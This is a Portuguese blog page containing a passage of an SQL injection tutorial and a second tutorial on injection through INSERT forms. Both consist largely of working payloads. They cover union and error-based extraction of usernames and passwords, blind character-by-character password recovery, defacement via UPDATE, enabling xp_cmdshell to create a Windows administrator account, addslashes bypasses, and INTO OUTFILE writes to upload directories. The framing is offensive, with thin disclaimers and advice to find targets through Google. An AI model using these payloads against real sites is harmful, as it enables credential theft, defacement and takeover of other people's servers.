null union select 1,2,column_name,4,5 from information_schema.columns where table_name=’login’ limit 0,1 –
E assim utilizamos o LIMIT novamente como cursor.
Ótimo, temos o nome de todas as tabelas, e as colunas da(s) tabela(s) que nos interessa(m), muito bom, e agora, como fazer para obter usuários e senhas, de nossa conhecida tabela login, supondo que descobrimos as colunas user, pass e privileges?
Quase terminando a parte que aborda o MySQL, permita-me ensinar como obter “linhas” de cada coluna da tabela, isto é, o que nos interessou desde o início. Fique sabendo que, encontrou sites vulneráveis, brincou com as tabelas e enfim, entendeu tudo que foi passado, meus parabéns. Para mim não foi tão fácil assim!
Bem, voltando ao objetivo…
Nós estávamos fazendo queries às tabelas do sistema, que para os nossos fins – e não nossos meios – de nada nos interessam. Então, a estrutura da query é a mesma.
null union select 1,2,user,4,5 from database.login –
Ótimo, obtemos um usuário, fulano.
Para obter a senha, como deve saber:
null union select 1,2,pass,4,5 from database.login where user=’fulano’ –
E está lá a senha. Para obter os privilégios, conteúdo da coluna privileges:
null union select 1,2,privileges,4,5 from database.login where user=’fulano’–
Cansativo pegar usuário com uma query, senha com outra query e privilégios com outra? Podemos (tentar) concatenar todos, e obter todos de uma tacada só:
null union select 1,2,concat_ws(user,pass,privileges),4,5 from database.login –
O limit ainda é válido nestes casos, podendo usar como cursor.
Supondo que já saibamos o nome de usuário, ou deduzimos a partir de qualquer lugar, que parte do nome de usuário é admin… Podemos usar o like:
null union select 1,2,concat_ws(user,pass,privileges),4,5 from database.login where user like ‘%admin%’ –
E assim, obtemos o usuário e a senha do administrador, cujo usuário seria; no exemplo, algo parecido com admin.
Bom, podemos obter senhas de usuários do site, ou podemos efetuar um defacement, para deixar a nossa assinatura.
Neste caso…
Neste caso, antes de qualquer coisa, devemos definir a tabela que queremos atacar. Supondo que queiramos modificar uma notícia, a mais recente, para uma mensagem como 6SÃOLAMMAH, primeiro, vamos descobrir quais colunas tem a tabela notícias, aquela em que estávamos no começo:

null union select 1,2,column_name,4,5 from information_schema.columns where table_name=’noticias’ limit 0,1 –

E aí, utilizamos o LIMIT como cursor novamente. Depois de descobrir todas as colunas, que em nosso exemplo seriam algo como id, titulo, texto, autor e data, nós podemos modificar o que queremos com o comando update.
Nesse caso, não estamos mais fazendo queries ao sistema. Agora vamos modificar o banco de dados, e por isso, devemos fechar a query que utilizava o id para se orientar.
Vamos utilizar um ID novo, atribuído a uma notícia fresquinha, para que ninguém tenha que pegar alguma das primeiras notícias para visualizar a sua “arte”. Supomos que este ID seja 1000, e montamos assim, atrás do ?id=:
null update noticias set texto=’6SÃOLAMMAH’ where noticias.id=1000 –
No exemplo, o que fazemos é fechar a string que pega o id, e através do ponto-e-vírgula, passamos outros comandos ao banco de dados. Sendo assim, ao menos em teoria, temos um defacement.
Fazer um deface pode e deve ser mais completo, então, deveríamos ao menos alterar o título da notícia e incrementar nosso texto com alguma coisa em HTML, para que o usuário tenha a sensação de que o “hacker” teve estilo, e não foi apenas idiota.
Quem se ligou agora, deve ter percebido que poderia utilizar algumas funções do PHP para reavivar uma antiga técnica, hoje em desuso, a dita PHP Injection que eu nem pretendo abordar na revista, por estar morta e por ter conteúdo sobrando pela internet…
Mas é isso!
Lembrando que não estou incentivando ninguém a cometer qualquer ato comprometedor, anti-ético ou ilícito, e assim, me isento de qualquer responsabilidade. É muito mais inteligente avisar o administrador que o site dele está vulnerável. O triste é fazer isso quando o administrador e o dono do site são a mesma pessoa, e ainda por cima, um web master, como já aconteceu comigo…
SQL Server
O SQL Server é um produto da Microsoft, sendo assim geralmente roda sob páginas .asp e obrigatoriamente, roda em Windows, já que creio que a Microsoft não vai criar uma versão da sua plataforma para o GNU/Linux...
Considero-o mais fácil de se explorar que o MySQL, não que o adversário seja difícil de explorar, mas falhas em SQL Server permitem causar mais estragos mais facilmente. Posteriormente veremos o motivo.
O esquema de verificação de vulnerabilidade é semelhante ao das plataformas MySQL, a aspa simples e a aspa dupla – e em alguns casos, parênteses e outros caracteres comuns de fechamento. Bom, se não tinha se ligado nisso…
Nos primeiros passos o que mudam são os erros.
Novamente, tentando fechar a string utilizando uma aspa simples, com
http://site.com.br/noticias.asp?id=null’, recebemos: ——————————————————————————————————-
Unclosed quotation mark before the character string ‘‘.
——————————————————————————————————-

Ao contrário do MySQL que é muito comum inserirmos aspa e não retornar nenhum erro, e mesmo assim o site estar vulnerável, no SQL Server é comum exibir o erro “na cara dura”. MySQL 1 x 0 SQL Server.
No SQL Server, vamos trabalhar um pouco diferente do que no MySQL, e podemos explorar diretamente a tabela em que estamos:
http://site.com.br/noticias.asp?id=null having 1=1 –
Surge algo tipo:
——————————————————————————————————-
Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘noticias.id’ is
invalid in the select list because it is not contained in an aggregate
function and there is no GROUP BY clause.
——————————————————————————————————-

Assim, conseguimos uma coluna da nossa tabela!
Para descobrir mais sobre a tabela das notícias, utilizamos a cláusula group by. Assim, injetamos:
http://site.com.br/noticias.asp?id=null group by noticias.id having 1=1 – ——————————————————————————————————-
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘noticias.titulo’ is
invalid in the select list because it is not contained in an aggregate
function and there is no GROUP BY clause.
——————————————————————————————————-

Agora, atrás do .asp?id=:
null group by noticias.id,noticias.titulo having 1=1 – ——————————————————————————————————-
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘noticias.texto’ is
invalid in the select list because it is not contained in an aggregate
function and there is no GROUP BY clause.
——————————————————————————————————-
null group by noticias.id,noticias.titulo,noticias.texto having 1=1– ——————————————————————————————————-
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘noticias.autor’ is
invalid in the select list because it is not contained in an aggregate
function and there is no GROUP BY clause.
——————————————————————————————————-
null group by noticias.id,noticias.titulo,noticias.texto,noticia s.autor having 1=1 – ——————————————————————————————————-
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘noticias.data’ is
invalid in the select list because it is not contained in an aggregate
function and there is no GROUP BY clause.
——————————————————————————————————-

Acabamos. Se executarmos isso:
null group by noticias.id,noticias.titulo,noticias.texto,noticia s.autor,noticias.data
having 1=1 –
——————————————————————————————————-
The text, ntext, and image data types cannot be compared or sorted, except
when using IS NULL or LIKE operator.
——————————————————————————————————-

Sobre esses group by nós podemos, ao invés de utilizar
noticias.id,noticias.etc, podemos também usar simplesmente id,etc, ou seja, não colocamos a tabela na frente. Porém, se existir a mesma coluna em outra tabela, com certeza teremos erros.
Agora, se quisermos, já podemos fazer um defacement:
null update noticias set texto=’6SÃOLAMMAH’ where noticias.id=1000 –
Bom, mas me diga, qual a utilidade do defacement?
Como já estamos bem afiados a esta altura do campeonato, não creio que valha a pena mostrar como obter senhas, porém… o limit não existe em SQL Server.
Ao invés de utilizar o limit, vamos usar uma query com top e not exist para explorar o banco de dados.
null union select top 1 1,2,user,4,5 from database.login where user not exist (select top 0 user from database.login)
O que acabamos de fazer é utilizar o top, que pega a linha x da coluna user, se este resultado não estiver em outra query semelhante, mas com o x-1.
A nossa próxima query seria:
null union select top 2 1,2,user,4,5 from database.login where user not exist (select top 1 user from database.login)

Como vemos, o limit realmente faz falta, mas nada que um cérebro e algumas outras funções não resolvam. Na verdade, o esquema é bem parecido com o limit, mas muda um pouco…
Agora que já aprendemos a explorar o banco de dados, vamos explorar o resto do sistema. Sim, em um servidor existe mais que um banco de dados…
Temos todo um sistema operacional, que a partir de SQL Injection, pode se tornar nosso, ou melhor, podemos tomar conta…
Agora que aprendemos como explorar o banco de dados, permita-me ensinar uma “falha de projeto” do SQL Server, que permite a execução remota de comandos, os mesmos comandos que se digitaria no prompt de comando.
Ou seja, a partir de agora, você terá poder sobre servidores SQL Servers vulneráveis a SQL. MySQL 2 x 0 SQL Server
No SQL Server existe uma função que executa comandos como se o
administrador estivesse em um prompt de comando, o tal do xp_cmdshell.
Supondo que o administrador queira testar a comunicação, ele pode dar um ping em loopback utilizando:
exec master..xp_cmdshell ‘ping localhost’;
Para o invasor, o esquema muda um pouco; estamos de intrusos no sistema e precisamos construir um query que execute esse xp_cmdshell.
Assim, atrás de um id, digitamos:
exec master..xp_cmdshell ‘ping localhost’;
E pronto, o servidor dá ping em loopback.
“Para que isso poderia ser útil?! Que comandos executo?!”
Permita-me exemplificar:
net user [usuario] [senha] /add {cria um usuário no servidor remoto e permite login por telnet ou por área de trabalho remota}.

Se for utilizado em conjunto com
net localgroup Administrators [usuario] /add {adiciona o usuário ao grupo dos administradores}
Por padrão, no SQL Server 2005 o xp_cmdshell está desativado por motivos de segurança, porém, se quisermos, podemos ativá-lo:
exec sp_configure ‘show advanced options’,1
reconfigure
exec sp_configure ‘xp_cmdshell’, ’1′
reconfigure

Lembrando que temos que adequar isso à query para SQL Injection.
Blind SQL Injection
Agora que já aprendemos o básico da SQL e já temos o mínimo de maturidade nesse tipo de técnica, podemos aprender sobre Blind SQL Injection. Antes, de começar, eu gostaria de fazer duas considerações.
A primeira é quanto a origem do nome “blind SQL injection”. Blind, em inglês, é um adjetivo que significa “cego”; isto quer dizer que não usamos os erros comuns para explorar o banco de dados.
A segunda, é que Blind SQL é um pouco mais difícil de entender e demorada que a Advanced SQL comum.
A Blind SQL surgiu da necessidade de burlar ou bypass um “filtro” utilizado por alguns web masters. Colocando-se um sinal de arroba (@) atrás da função que pega os dados, os erros que esta função poderia exibir são ocultos. Normalmente, isso dá uma certa impressão de segurança ao web master que não entende as possibilidades da Blind SQL Injection.
O que fazemos na Blind SQL é utilizar o operador AND para comparar o resultado de uma query com o ID, e retornar os valores booleanos TRUE ou FALSE.
Para descobrir a vulnerabilidade, utilizamos de cara o AND:
http://site.com.br/noticia.php?id=1 and 1=1
http://site.com.br/noticia.php?id=1 and 0=1

O primeiro, caso o site esteja vulnerável, retorna o valor TRUE – já que 1 sempre é igual a 1 – e exibe a página corretamente. No segundo endereço fictício, o site não retornaria uma página “coerente” com o site, já que o resultado sempre é FALSE.
Concluímos que o nosso site fictício está sim vulnerável a Blind SQL e vamos partir para cima dele. Como é um portal de notícias que usa IDs para “linkar” as notícias e é um site brasileiro – que fala português – é provável que a tabela que guarda as notícias seja algo como noticia, noticias, noti, news e muitos outros padrões de administração.
Para explorar o banco de dados, nós vamos utilizar o AND da mesma forma, porém, vamos verificar se um é igual ao resultado de alguma query. Basicamente, é assim que funciona Blind SQL.
O problema de sempre é que não conseguimos visualizar nomes de databases, tabelas e colunas via information_schema ou via sysobjects, e sempre temos que “chutar” o nome…
Primeiramente, vamos descobrir o nome de algumas tabelas.
http://site.com.br/noticias.php?id=1 and 1=(select * from noticias)
Neste caso, seguindo as tabelas que usei como exemplo anteriormente, a página seria exibida normalmente, indicando que de fato existe a tabela noticias. Sabendo disso, poderíamos testar n nomes de tabelas para descobrir qual a tabela que guarda os nomes de usuários e senhas. Não muda muita coisa para capturar nomes de colunas:
http://site.com.br/noticias.php?id= 1 and 1=(select texto from noticias)
Se a coluna texto existir, então a página da notícia 1 é exibida.
Agora já poderíamos efetuar um defacement:

http://site.com.br/noticias.php?id=1000 and 1=(update noticias insert set texto=’6SÃOLAMMAH’ where noticias.id=1000)

Provavelmente, a página já será exibida com o novo texto.
Mas como vivo dizendo, para fins didáticos, o defacement não acrescenta nada.
Caso esteja interessado em expor suas idéias, tente fazer algum outro tipo de protesto…
Agora o objetivo é capturar alguma conta e senha de algum usuário.
Depois de algumas tentativas, descobrimos a tabela que contém os nomes de usuários, senhas e outras informações que não são tão interessantes para nós, cujo nome é login.
Descobrimos também que ela tem as colunas user, pass e privileges por métodos citados anteriormente.
Para descobrir o conteúdo de alguma coluna é um pouco mais difícil, visto que temos que testar os caracteres um por um em valor ASCII.
Vamos utilizar então as funções ascii() e substring().
Supondo que eu tenha algum nome de usuário em mãos, qualquer que seja o meio pelo qual o consegui, basta eu pegar a senha. No exemplo, o usuário seria vitima e a suposta senha, senha, sem números e de apenas letras. O correto seria utilizar letras maiúsculas e minúsculas em senhas, mas isso quase nunca acontece, então podemos testar apenas com letras minúsculas.
Vamos dividir o alfabeto ao meio, pegando o caractere “m” (109) e checando se a primeira letra da senha está acima ou abaixo de “m”:
http://site.com.br/noticias.php?id=1 AND ascii(substring((select pass from login where user=’vitima’),1,1)) > 109
A página foi exibida, o que significa que o primeiro caractere está acima de ‘m’:

http://site.com.br/noticias.php?id=1 AND ascii(substring((select pass from login where user=’vitima’),1,1)) > 117

Agora a página não é exibida, pois ‘s’ em ASCII é 115. Vamos tentar 113:

http://site.com.br/noticias.php?id=1 AND ascii(substring((select pass from login where user=’vitima’),1,1)) > 113

A página é exibida, então temos um caractere ASCII entre 113 e 117.
http://site.com.br/noticias.php?id=1 AND ascii(substring((select pass from login where user=’vitima’),1,1)) > 114
TRUE novamente.
http://site.com.br/noticias.php?id=1 AND ascii(substring((select pass from login where user=’vitima’),1,1)) > 115
FALSE! Isso significa que é 115! Ou, em caracteres, a letra “s”.
Para pegar o próximo caractere da senha, no caso, “e”, fazemos o mesmo, porém, vamos mudar a substring:

http://site.com.br/noticias.php?id=1 AND ascii(substring((select pass from login where user=’vitima’),2,1))
SQL sem aspas
Provavelmente, enquanto estava injetando SQL em alguma página – não adianta negar que não tentou – provavelmente, deve ter recebido um erro semelhante a este:
——————————————————————————————————-
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near ‘\’’ at line 1
——————————————————————————————————-

Pois bem, o administrador tentou proteger seu sistema utilizando uma função que adiciona uma barra invertida “\” antes de aspas duplas e aspas simples, a addslashes(). Como sabemos, podemos fazer grande parte da SQL sem aspas , mas quando forem necessárias, podemos utilizar de vários meios para burlar essa proteção. Um deles, para MySQL, é converter cada caractere para seu valor ASCII e utilizar o seguinte formato:
char (11,22,33,44,55)
Em SQL Server, você pode utilizar uma solução parecida:
char (11) + char (22) + char (33) + char (44) + char (55)
Podemos ainda utilizar valores hexadecimais, precedidos por 0x, que indica o valor hexadecimal da constante, deste modo:
0×1122334455

SQL Tricks (truques)
Bom, aqui estão algumas considerações que podem ser decisivas na hora de uma boa SQL: • — (dois sinais menos) são sinais de comentários “padrão”, mas dependendo do sistema, deve-se usar /* ou #);
• às vezes, o sistema bloqueia espaços no campo de id, para burlar isso e juntar tudo, podemos utilizar %20 no lugar de espaços e %27 no lugar de aspas simples;
• quando isso não funciona, podemos substituir espaços por char(0×20), por +, e em MySQL, às vezes, por /**/;
• se estiver trabalhando em sistemas com que se orientam por IDs e números em geral, não use aspas duplas ou aspas simples, pois não se usa qualquer tratamento diferente com números, ao contrário das strings;
• scanners são para lammers, se quiser achar alguma página vulnerável, utilize o Google;
• tudo varia muito, cada site tem sua própria plataforma, dialeto, padrões e forma de trabalhar diferente, aqui eu procurei ser bastante genérico falando do SQL Server e do MySQL, mas não disse tudo;
Finalizando

Eu gostaria de pedir que o caro leitor não utilize este conhecimento como lammer, ou como script-kiddie, mas sim como um ser humano maduro que “hackeia” apenas para contemplar as falhas do sistema.

Tutorial SQL Injection em INSERT INTO




sql_inject

Vou mostrar aqui uma técnica interessante para fazer SQL Injection baseado em Inserts.
É bom que você saiba algo sobre a linguagem SQL e como é um ataque de SQLi comum, ou o conteúdo ficará mais complicado.
Muitas vezes você encontra um alvo vulnerável a injeção de SQL, mas em uma query baseada em insert.
Isto é muito comum em formulários de comentário, cadastros e livros de visitas.
Por exemplo: digamos que o alvo tenha o seguinte formulário de cadastro:


1
2
3
4
Nome:
E-mail:
Login:
Senha:
Então, ao inserir uma aspa em um campo, notamos que nos veio um erro de SQL ou nós não fomos cadastrados. Isto provavelmente quer dizer que ele está vulnerável.
Temos várias maneiras para atacar. Vou mostrar apenas algumas.
Outras você pode ir em busca, na internet ou mesmo usar um pouco da criatividade e conhecimento em SQL pra montar suas próprias maneiras. Mas, primeiramente, vamos à lógica:
Saiba que se os dados que serão inseridos pelo comando INSERT INTO estão entre aspas, como no exemplo abaixo:

1
INSERT INTO tabela VALUES ('$_POST[nome]', '$_POST[email]')
Um simples escapamento de aspas pode nos barrar. Teremos que contar com a falta disso.
Vamos precisar descobrir a quantidade de colunas que estamos lidando (as que estão sendo inseridas). Para tanto, colocaremos o seguinte no campo vulnerável (repare os espaços ao final dos ‘–’):

1
2
3
', '1');--
', '1', '2');--
', '1', '2', '3');--
Vamos inserindo um campo a mais gradativamente e observar quando não há erro retornado ou quando somos cadastrados corretamente. Sim, isso é mais demorado. Digamos que estejamos lidando com 1 coluna vulnerável.
Assim, vamos procurar identificar o que é aquela coluna. Como inserimos apenas o algarismo 1, procuramos no campo do perfil onde está este “1″. Ali será nossa chave.
Agora o ataque é baseado em consultas secundárias, com resultados únicos (apenas uma coluna e uma linha por vez) e impressos em uma dessas colunas. Por exemplo, vamos obter a versão do SQL, pra saber se podemos utilizar o banco de dados ‘information_schema’ (a versão precisa ser igual ou superior a 5, quando isto foi implementado). Veja o que vamos inserir no campo vulnerável:

1
', version());--
Vamos no mesmo local onde vimos o algarismo “1″ e veremos a versão do MySQL. Supomos que tenha o information_schema (ou teríamos que ir chutando o nome das tabelas e colunas). A query secundária ficará entre parêntesis. Como já dito, deve ter apenas uma coluna e uma linha. Você pode unir várias colunas em uma, usando funções como concat(), concat_ws() e group_concat().

1
,' (select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,1));--
Mas pode ocorrer que você não possua acesso direto aos dados das colunas vulneráveis. Neste caso, você pode tentar usar o INTO OUTFILE pra exportar os dados para um arquivo. É necessário ter privilégios para tal.
É necessário também saber a localização física do servidor. Você pode procurar isso em um erro. Saia à procura de erros, que se pareçam com:

1
(Tipo do erro): (Descrição) in /home/localizacao/do/site/arquivo.php on line X
Isso é com você. Saia procurando por erros em todos os cantos do site. É melhor ainda encontrar diretórios de uploads (já que possuem permissões de escrita – CHMOD 777). Então, faça a sua query, adicionando “INTO OUTFILE [arquivo]” no final. Veja:

1
,' (select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,1) INTO OUTFILE /home/localizacao/do/site/upload/dados.txt);--
(Quero aqui frizar o espaço ao final do ‘–’. É necessário). A partir daí, você simplesmente “acessa” o arquivo gerado para obter os dados.
Caso o servidor não seja MySQL e suporte mais de uma consulta, você pode fazer uma segunda query, até mesmo inserindo dados, da seguinte maneira:

1
,'1'); INSERT INTO tabela (`coluna1`, `coluna2`) VALUES ('valor1', 'valor2');-- (espaço aqui)
Alternativamente, você também pode atacar às cegas baseado no tempo de resposta (timing-based blind sql injection).
Neste tipo de ataque, você estará se baseando no valor booleano (true/verdadeiro ou false/incorreto), como em qualquer blind. Mas a resposta virá no tempo que o servidor te envia a resposta.
Mas isso vamos ver numa próxima. Tudo bem assim?
Bons estudos.
Postagem mais recente Postagem mais antiga Página inicial

Populares

Recente

Software Avançado De Investigação Forense Móvel

O MOBILedit Forensics é um software forense avançado para telefones, que  extrai  e  analisa profundamente o conteúdo do telefone,  incluind...